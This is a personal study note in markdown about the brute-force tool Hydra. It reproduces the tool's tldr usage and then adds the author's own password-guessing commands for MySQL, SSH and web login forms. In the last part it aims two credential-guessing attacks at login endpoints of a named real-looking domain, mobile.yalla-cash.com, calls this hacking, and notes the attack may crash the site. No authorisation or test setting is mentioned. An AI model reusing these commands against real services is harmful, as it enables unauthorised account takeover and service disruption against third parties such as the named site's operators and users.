hydra
"/home/yossef/notes/personal/fuckit/hydra.md"
path: personal/fuckit/hydra.md
- **fileName**: hydra
- **Created on**: 2025-06-07 18:47:34
so first what is hydra is tool using for brute force attack on any thing
tldr exmpale:
➜ notes git:(main) ✗ tldr hydra
hydra
Online password guessing tool.
Protocols supported include FTP, HTTP(S), SMTP, SNMP, XMPP, SSH, and more.
More information: https://manned.org/hydra.
- Start Hydra's wizard:
hydra-wizard
- Guess SSH credentials using a given username and a list of passwords:
hydra -l username -P path/to/wordlist.txt host_ip ssh
- Guess HTTPS webform credentials using two specific lists of usernames and passwords ("https_post_request" can be like "username=^USER^&password=^PASS^"):
hydra -L path/to/usernames.txt -P path/to/wordlist.txt host_ip https-post-form "url_without_host:https_post_request:login_failed_string"
- Guess FTP credentials using usernames and passwords lists, specifying the number of threads:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -t n_tasks host_ip ftp
- Guess MySQL credentials using a username and a passwords list, exiting when a username/password pair is found:
hydra -l username -P path/to/wordlist.txt -f host_ip mysql
- Guess RDP credentials using a username and a passwords list, showing each attempt:
hydra -l username -P path/to/wordlist.txt -V rdp://host_ip
- Guess IMAP credentials on a range of hosts using a list of colon-separated username/password pairs:
hydra -C path/to/username_password_pairs.txt imap://[host_range_cidr]
- Guess POP3 credentials on a list of hosts using usernames and passwords lists, exiting when a username/password pair is found:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -M path/to/hosts.txt -F pop3
how to use ot hack amysql db or maridb or postgres
# for localhost
hydra -L users.txt -P password.txt localhost mysql
# for new ipconfig and ip
hydra -l <username> -P <password_file> <target_IP> mysql
hydra -L users.txt -P password.txt 192.168.1.7 mysql
so now if want to use it first create a two files one for users and one
for passwords and then write the commend and using for specific case like
explain in top and the passing the password file and users file as param for
the commend and then enter
using for ssh ;) -> this suck man
# main commend
hydra -L users.txt -P password.txt ssh://192.168.1.100
ex: (hydra -vV -L users.txt -P passwords.txt ssh://192.168.1.100)
# for speecific port
hydra -L users.txt -P password.txt ssh://target_IP -s PORT
first must check if ssh port open or not by nmap and then using the commend
and type the ip for the target device and then do it and make the two files
two users and passwords and passing theme as param
now the most important use case for it to use in web
## --------- hint maybe this cursh the website take care -----------
hydra -L users.txt -P password.txt mobile.yalla-cash.com https-post-form \
"/login:license_number=^USER^&password=^PASS^&submit=Login:Invalid login" \
-V -s 443 -f
## second fuck
hydra -L users.txt -P password.txt mobile.yalla-cash.com https-post-form \
"/api/mob/login:phone=^USER^&license_num=^PASS^:Invalid login" \
-s 443 -f
in the commends in top i use moblie.yalla-cash.com as example for hacking
passing the users file and passwords file as param and then specifiy what type
of request gone go to server for our example post resquest and then
type the route and the param for request (input field for form in website)
continue:[[]]
before:./setup_vpn.md